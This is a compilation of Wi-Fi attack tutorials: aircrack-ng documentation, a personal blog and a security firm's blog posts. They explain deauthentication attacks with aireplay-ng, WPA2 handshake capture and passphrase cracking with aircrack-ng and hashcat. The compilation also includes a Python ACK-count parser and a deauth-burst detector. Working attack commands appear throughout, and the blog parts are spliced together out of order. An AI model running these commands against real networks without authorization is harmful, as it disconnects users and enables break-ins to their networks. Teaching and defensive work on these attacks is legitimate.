Deauthentication

Description
This attack sends disassociate packets to one or more clients which are currently associated with a
particular access point. Disassociating clients can be done for a number of reasons:

- Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
- Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
- Generating ARP requests (Windows clients sometimes flush their ARP cache when disconnected)

Of course, this attack is totally useless if there are no associated wireless clients, or against fake
authentications.

Usage
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

- -0 means deauthentication
- 1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
- -a 00:14:6C:7E:40:80 is the MAC address of the access point
- -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
- ath0 is the interface name

Usage Examples
Typical Deauthentication

First, you determine a client which is currently connected. You need the MAC address for the
following command:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0

Where:

- -0 means deauthentication
- 1 is the number of deauths to send (you can send multiple if you wish)
- -a 00:14:6C:7E:40:80 is the MAC address of the access point
- -c 00:0F:B5:AE:CE:9D is the MAC address of the client you are deauthing
- ath0 is the interface name

Here is typical output:

12:35:25 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]

For directed deauthentications, aireplay-ng sends out a total of 128 packets for each deauth you
specify. 64 packets are sent to the AP itself and 64 packets are sent to the client.

Here is what the “[ 61|63 ACKs]” means:

- [ ACKs received from the client | ACKs received from the AP ]
- You will notice that the numbers in the example above are lower than 64, which is the number of packets sent in each direction. It is not unusual to lose a few packets. Conversely, if the client was actively communicating at the time, the counts could be greater than 64.
- How do you use this information? It gives you a good indication of whether the client and/or AP heard the packets you sent. A zero value definitely tells you the client and/or AP did not hear your packets. Very low values likely indicate you are quite a distance away and the signal strength is poor.
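The reading of the ACK counts given above is easy to get wrong by eye when aireplay-ng scrolls several status lines past. The following Python is an added example, not aircrack-ng project code: it parses the directed-deauth status line format shown on this page and applies the page's interpretation (64 frames per direction, [client ACKs | AP ACKs], zero means not heard, low means distance or poor signal, above 64 is possible when the client was busy). The cut-off for "low" (under a quarter of the frames sent) is this example's own assumption, not a value aireplay-ng defines; the sample lines after the first two are constructed.

```python
"""Parse aireplay-ng directed-deauth status lines and read the ACK counts.

Added example; not aircrack-ng project code. Parses lines such as
    12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]
"""
import re
from typing import Optional

STATUS_RE = re.compile(
    r"^(?P<time>\d\d:\d\d:\d\d)\s+Sending\s+(?P<sent>\d+)\s+directed\s+DeAuth\.\s+"
    r"STMAC:\s+\[(?P<stmac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\]\s+"
    r"\[\s*(?P<client>\d+)\|(?P<ap>\d+)\s+ACKs\]$"
)
LOW_FRACTION = 0.25   # assumption: fewer ACKs than this share of frames sent = weak link


def parse_status(line: str) -> Optional[dict]:
    """Return the fields of one status line, or None for any other aireplay-ng output line."""
    m = STATUS_RE.match(line.strip())
    if not m:
        return None
    return {
        "time": m["time"],
        "sent": int(m["sent"]),            # frames sent in each direction (64 on this page)
        "stmac": m["stmac"].upper(),
        "client_acks": int(m["client"]),   # left number: ACKs from the client
        "ap_acks": int(m["ap"]),           # right number: ACKs from the AP
    }


def judge(acks: int, sent: int) -> str:
    """Turn one ACK count into the verdict the page gives for that side of the link."""
    if acks == 0:
        return "not heard"
    if acks < sent * LOW_FRACTION:
        return "weak signal or too far"
    if acks > sent:
        return "heard (client was active, extra ACKs)"
    return "heard"


def interpret(line: str) -> Optional[dict]:
    """Parse a status line and attach a verdict for the client side and the AP side."""
    s = parse_status(line)
    if s is None:
        return None
    s["client"] = judge(s["client_acks"], s["sent"])
    s["ap"] = judge(s["ap_acks"], s["sent"])
    return s


def summarize(lines) -> list:
    """Interpret every status line in a block of aireplay-ng output; other lines are skipped."""
    return [r for r in (interpret(line) for line in lines) if r is not None]


# Constructed sample output; the first two lines are the ones shown on this page.
SAMPLE_OUTPUT = [
    "12:35:25 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9",
    "12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]",
    "12:35:26 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 0|58 ACKs]",
    "12:35:27 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 5|60 ACKs]",
    "12:35:28 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 70|66 ACKs]",
]

if __name__ == "__main__":
    for r in summarize(SAMPLE_OUTPUT):
        print(f'{r["time"]} client={r["client_acks"]:>3} ({r["client"]})  '
              f'ap={r["ap_acks"]:>3} ({r["ap"]})')
```

Feed it the saved terminal output of a run (one line per list element) and it returns one record per deauth burst; the "Waiting for beacon frame" line and anything else aireplay-ng prints is skipped rather than misread.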

WPA/WPA2 Handshake capture with an Atheros

airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap

Explanation of the above:

airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0

Where:

- -c 6 is the channel to listen on
- --bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point
- -w out is the file prefix of the file name to be written
- ath0 is the interface name

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

Where:

- -0 means deauthentication attack
- 5 is the number of groups of deauthentication packets to send out
- -a 00:14:6C:7E:40:80 is the MAC address of the access point
- -c 00:0F:B5:AB:CB:9D is the MAC address of the client to be deauthenticated
- ath0 is the interface name

Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”:

12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0 (switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

After sending the ten batches of deauthentication packets, we start listening for ARP requests
with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.

If the driver is wlan-ng, you should run the airmon-ng script (unless you know what to type);
otherwise the card won't be correctly set up for injection.

Usage Tips
It is usually more effective to target a specific station using the -c parameter.

The deauthentication packets are sent directly from your PC to the clients. So you must be
physically close enough to the clients for your wireless card transmissions to reach them.

Usage Troubleshooting
Why does deauthentication not work?
There can be several reasons and one or more can affect you:

- You are physically too far away from the client(s). You need enough transmit power for the packets to reach and be heard by the clients. If you do a full packet capture, each packet sent to the client should result in an “ack” packet back. This means the client heard the packet. If there is no “ack” then likely it did not receive the packet.
- Wireless cards work in particular modes such as b, g, n and so on. If your card is in a different mode than the client card, there is a good chance that the client will not be able to correctly receive your transmission. See the previous item for confirming the client received the packet.
- Some clients ignore broadcast deauthentications. If this is the case, you will need to send a deauthentication directed at the particular client.
- Clients may reconnect too fast for you to see that they had been disconnected. If you do a full packet capture, you will be able to look for the reassociation packets in the capture to confirm deauthentication worked.

General
See the general aireplay-ng troubleshooting ideas: aireplay-ng usage troubleshooting.

Disconnect devices from WiFi networks.


Deauthentication Attack using aireplay-ng
#cybersecurity #ethicalhacking #hacking #linux

Hello! In this post I will explain to you how to deauthenticate any device from a WiFi network
without being connected to the network itself!
Beware, this is illegal without permission, and it can be detected.

What you should know:

- The target device MUST be connected to a WiFi network.
- The target device might switch to another WiFi network that's saved, or use mobile data.
- You need a WiFi adapter that supports monitor mode. (I am using the Alfa AWUS036ACH)

Data you need to perform the attack:

- The router's BSSID.
- The target device's MAC address.

(How to get this data is explained below.)

How it's done:

First you need to make sure that your adapter is in monitor mode (so it can start receiving
packets around you).
You can check the mode of your adapter with $ iwconfig
If it's not in monitor mode yet you need to follow these steps:

- Disable your adapter: $ ifconfig wlan1 down
- Change mode to monitor mode: $ iwconfig wlan1 mode monitor
- Enable the adapter: $ ifconfig wlan1 up
Now that your adapter is in monitor mode, it can receive all WiFi packets sent all around you
from different devices. (Even if you are not connected to the network, or if you don't have the
password of the network.)
What we need to do now, is intercept those packets. To intercept those packets we are using a
packet sniffer called airodump-ng.
This will allow us to collect data from nearby WiFi connections (such as the BSSID, Channel,
Encryption method) and even devices connected to the networks.

To use airodump-ng we can run the following command, and the given interface [wlan1] will
start collecting data.
$ airodump-ng wlan1
When you see the networks listed. You can use this information as a filter to collect data of a
specific network.
Now you can specify the bssid and channel of the network.
$ airodump-ng --bssid [NETWORK_BSSID] --channel [NETWORK_CHANNEL] wlan1

Optionally you can use --write [filename] in the command. This way you save the collected
packets in a file, which you could analyze further with wireshark.
Now we can see the devices connected to the network. (Listed under STATION)
Once you have the MAC Address of the target device, and the BSSID of the router. You have
enough information to start the deauthentication attack.

To start the deauthentication attack you can use the following command:
$ aireplay-ng --deauth 0 -a [ROUTER_BSSID] -c [TARGET_MAC_ADDRESS] wlan1

--deauth 0 means that you will send infinite deauthentication packets. It stops sending packets
whenever you stop the program from executing. (CTRL + C)
(NOTE: airodump-ng should be running with the bssid & channel specified simultaneously
with aireplay-ng! )

# aireplay-ng -0 0 -D -a AC:BD:80:CC:0F:AA wlan0

In our previous blog post (Part 1) of the Wi-Fi Hacking series, we went through setting up our
Alfa card, decloaking hidden SSIDs, passively capturing handshakes and cracking the
passphrase using aircrack-ng. Here, we are going to perform an active deauth attack on a WPA2-PSK
Wi-Fi network, capture the handshake and then try to crack the passphrase using hashcat.

We’ll start off by running airodump-ng on 2.4 GHz by using the ‘--band b’ option.

We can see a lot of wireless frames being captured.


We are going to target the AP with the ESSID of Wireless PT for our demonstration.

We’ll use airodump-ng again, this time with the -d, -c and -w flags to specify our AP MAC
address, the respective channel number and the output filename.
A client/STA is required to be connected to the target AP in order to perform active deauth
attacks. We can see that an STA is connected to our AP from the frames being captured by our
alfa card.

We’ll go through how a deauthentication attack works before actually performing it.

What is a Deauthentication (Deauth) Attack?

The IEEE 802.11 protocol contains the provision for a deauthentication management frame.
These management frames are not encrypted (except for IEEE 802.11w). This message indicates
that the sender wishes to terminate the wireless connection to the receiver. An attacker can spoof
the STA’s MAC address and send a deauthentication frame to the AP. This effectively
disconnects the STA from the AP. The STA tries to reconnect to the AP after a short while.
When this happens, we can capture the 4-way handshake and try to crack the passphrase. Now
that we have covered the theory in brief, we can move forward with the attack.
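Because the deauthentication frame is an unencrypted management frame (outside 802.11w), the same property that lets it be forged also makes the attack easy to spot from the air: a burst of deauth or disassociation frames for one BSSID, far denser than any real roaming event, followed by the targeted station re-associating. The Python below is an added example, not code from this blog or from the aircrack-ng project. It parses the fixed 24-byte 802.11 management-frame header, classifies deauthentication (subtype 12) and disassociation (subtype 10) frames, records whether the Protected Frame bit that 802.11w sets is present, and alerts on a BSSID whose disconnect frames exceed a threshold inside a sliding window, noting any targeted station that sent an (re)association request shortly afterwards. The window, threshold and reconnect values are this example's own assumptions, and the sample frames are constructed fixtures that reuse the AP and client MAC addresses shown earlier on this page.

```python
"""Deauthentication / disassociation burst detector over raw 802.11 frames.

Added example, not code from the original page or the aircrack-ng project.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

SUBTYPE_ASSOC_REQ, SUBTYPE_REASSOC_REQ = 0, 2
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12
DISCONNECT = {SUBTYPE_DISASSOC, SUBTYPE_DEAUTH}
RECONNECT = {SUBTYPE_ASSOC_REQ, SUBTYPE_REASSOC_REQ}


@dataclass
class MgmtFrame:
    subtype: int
    protected: bool         # Frame Control "Protected Frame" bit (set under 802.11w)
    da: str                 # address 1: receiver
    sa: str                 # address 2: transmitter
    bssid: str              # address 3
    reason: Optional[int]   # reason code, only readable on unprotected deauth/disassoc


def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_mgmt(frame: bytes) -> Optional[MgmtFrame]:
    """Return a MgmtFrame for a management frame; None for data/control or truncated frames."""
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 0:          # type field: 0 = management
        return None
    subtype = (fc0 >> 4) & 0xF
    protected = bool(fc1 & 0x40)
    reason = None
    if subtype in DISCONNECT and not protected and len(frame) >= 26:
        reason = int.from_bytes(frame[24:26], "little")   # first body field
    return MgmtFrame(subtype, protected, _mac(frame[4:10]), _mac(frame[10:16]),
                     _mac(frame[16:22]), reason)


def detect_bursts(frames, window=2.0, threshold=8, reconnect_within=30.0):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes). Returns one alert per BSSID."""
    disconnects = defaultdict(list)     # bssid -> [(ts, MgmtFrame)]
    reconnects = defaultdict(list)      # bssid -> [(ts, station address)]
    for ts, raw in frames:
        m = parse_mgmt(raw)
        if m is None:
            continue
        if m.subtype in DISCONNECT:
            disconnects[m.bssid].append((ts, m))
        elif m.subtype in RECONNECT:
            reconnects[m.bssid].append((ts, m.sa))
    alerts = []
    for bssid, events in disconnects.items():
        events.sort(key=lambda e: e[0])
        peak, start, peak_end = 0, 0, 0.0
        for end in range(len(events)):              # sliding window over timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 > peak:
                peak, peak_end = end - start + 1, events[end][0]
        if peak < threshold:
            continue
        targets = {m.da for _, m in events}
        came_back = sorted(sa for ts, sa in reconnects[bssid]
                           if sa in targets and peak_end <= ts <= peak_end + reconnect_within)
        alerts.append({
            "bssid": bssid,
            "peak_in_window": peak,
            "unprotected": sum(1 for _, m in events if not m.protected),
            "targets": sorted(targets),
            "reasons": sorted({m.reason for _, m in events if m.reason is not None}),
            "reconnected_after": came_back,
        })
    return alerts


# ---- constructed sample frames (fixtures, not captured traffic) ----
AP = "00146c7e4080"     # 00:14:6C:7E:40:80, the AP used on this page
STA = "000fb5aece9d"    # 00:0F:B5:AE:CE:9D, the client used on this page


def _frame(fc_hex, da_hex, sa_hex, bssid_hex, body_hex=""):
    # fc (2) | duration (2) | addr1 | addr2 | addr3 | sequence control (2) | body
    return bytes.fromhex(fc_hex + "3a01" + da_hex + sa_hex + bssid_hex + "0000" + body_hex)


DEAUTH_TO_STA = _frame("c000", STA, AP, AP, "0700")   # reason 7, sent towards the client
DEAUTH_TO_AP = _frame("c000", AP, STA, AP, "0700")    # reason 7, sent towards the AP
STA_LEAVING = _frame("c000", AP, STA, AP, "0300")     # reason 3: an ordinary disconnect
PMF_DEAUTH = _frame("c040", STA, AP, AP, "00112233445566778899")  # protected bit set
BEACON = _frame("8000", "ffffffffffff", AP, AP, "00000000000000006400")
DATA_FRAME = _frame("0802", STA, AP, AP)              # type 2: ignored by parse_mgmt
ASSOC_REQ = _frame("0000", AP, STA, AP, "31040a00")   # the station coming back

BENIGN_TRACE = [(0.0, BEACON), (0.1, DATA_FRAME), (5.0, STA_LEAVING), (5.5, PMF_DEAUTH)]
# The 64 + 64 directed frames per deauth described on this page, then the client re-associating.
ATTACK_TRACE = [(0.0, BEACON)]
for i in range(64):
    ATTACK_TRACE.append((10.0 + i * 0.003, DEAUTH_TO_STA))
    ATTACK_TRACE.append((10.0 + i * 0.003 + 0.001, DEAUTH_TO_AP))
ATTACK_TRACE.append((10.8, ASSOC_REQ))

if __name__ == "__main__":
    print(detect_bursts(BENIGN_TRACE))
    for alert in detect_bursts(ATTACK_TRACE):
        print(alert)
```

On a real sensor the `(timestamp, bytes)` pairs would come from a monitor-mode capture with the radiotap header stripped; the parser only needs the 802.11 header itself. The `unprotected` count is the field that tells a defender whether 802.11w would have stopped the burst from taking effect, and `reconnected_after` is the same re-association the text above relies on for the handshake capture, seen from the other side.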

We can use aireplay-ng tool on a new terminal to send deauth frames as shown below.

The STA disconnects from the AP and reconnects after some time. Airodump captures the 4-way
handshake during reconnection.
We have successfully captured the 4-way handshake between the STA and AP. Now, we can
proceed to crack the passphrase. We’ll need hcxpcapngtool from the hcxtools package to convert the
airodump-ng output .CAP file to hashcat’s 22000 mode. We can install the hcxtools
package from Kali Linux’s default repo using the commands shown below.

After installing the package, we can use hcxpcapngtool to convert our ‘wifi_deauth-01.cap’ file
to hashcat’s 22000 format.
We need to transfer the file to the host OS to utilize the GPU, and download hashcat on the host
OS. For the word-list we will be reusing the one from our previous blog.
We successfully demonstrated a WPA2 deauthentication attack and managed to crack the
passphrase too. We’ll get into other wireless attacks in upcoming blogs.

By partnering with Redfox Security, you’ll get the best security and technical skills required to
execute an effective and thorough penetration test. Our offensive security experts have years of
experience assisting organizations in protecting their digital assets through penetration testing
services. To schedule a call with one of our technical specialists, call 1-800-917-0850 now.

Redfox Security is a diverse network of expert security consultants with a global mindset and a
collaborative culture. If you are looking to improve your organization’s security posture, contact
us today to discuss your security testing needs. Our team of security professionals can help you
identify vulnerabilities and weaknesses in your systems and provide recommendations to
remediate them.

Wi-Fi stands for wireless network technology. It establishes wireless network connections using
radio waves. Malicious hackers frequently opt to penetrate firms by compromising their Wi-Fi
networks, mainly due to the nature of Wi-Fi and its methods for enabling network access.
Households are also at risk, owing to the proliferation of IoT-connected devices and appliances.

In Part 1 of the Wi-Fi Hacking series, we are going to delve into Wi-Fi hacking, specifically
on Wi-Fi network decloaking, capturing WPA handshakes and obtaining cleartext passphrase
using passive techniques (i.e., not performing de-authentication attacks). We will be using Kali
Linux in VirtualBox and a USB wireless adapter (Alfa AWUS036ACH which uses Realtek
RTL8812AU chipset) which can support monitor mode and packet injection.

We will be covering the following topics:

1. Configuring the Wireless Adapter
2. Discovering Nearby Wi-Fi Networks
3. Decloaking Hidden Wi-Fi Networks
4. Cracking the Passphrase

Configuring the Wireless Adapter


Before we get into the good stuff, we need to properly set up our Alfa card. First, we need to
pass through our wireless USB adapter to Kali Linux by configuring the VirtualBox settings.

Next, we boot up our Kali VM and install the respective wireless device driver. In our case we
install the realtek-rtl88xxau-dkms from the default kali repository using apt install command.
To check whether kali detects our wireless adapter, we can use the ‘iwconfig’ command.

We can see that the ‘wlan0’ interface is now active and that it’s in ‘managed’ mode.

To set our wireless adapter in ‘monitor’ mode, we can use the ‘airmon-ng’ tool. But before we
do that, we need to check whether there are any running processes which could cause problems
and kill them. This can be done by using ‘airmon-ng check kill’ command.

Now, we can set our wireless adapter to ‘monitor’ mode.


To verify whether our ‘wlan0’ interface is in ‘monitor’ mode, we can run ‘iwconfig wlan0’
command.

We have now successfully set up our wireless adapter. Next, we can move on to the attack phase.

Discovering Nearby Wi-Fi Networks


We will be using the aircrack-ng suite in this blog post. We can find nearby Wi-Fi networks by
using the ‘airodump-ng’ tool in Kali, along with specifying our interface name. Note that we are
not specifying any particular channel, so ‘airodump-ng’ will automatically switch between
channels.
We can see a lot of information being displayed on the terminal. Let’s go through each column to
understand what is being displayed.
